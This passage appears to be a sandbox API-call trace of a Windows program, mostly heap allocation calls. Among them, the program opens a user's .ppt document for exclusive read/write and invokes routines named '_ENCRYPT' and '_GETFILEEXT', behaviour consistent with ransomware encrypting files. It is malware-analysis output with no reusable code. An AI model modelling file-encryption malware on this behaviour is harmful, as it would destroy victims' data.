hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.443] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.443] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.443] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.443] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.444] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.446] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.448] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.448] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\146rtg30pal-lzim9l_.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.448] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.449] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.449] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.449] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.449] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.450] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.450] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.451] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.451] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.451] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.451] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.451] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: 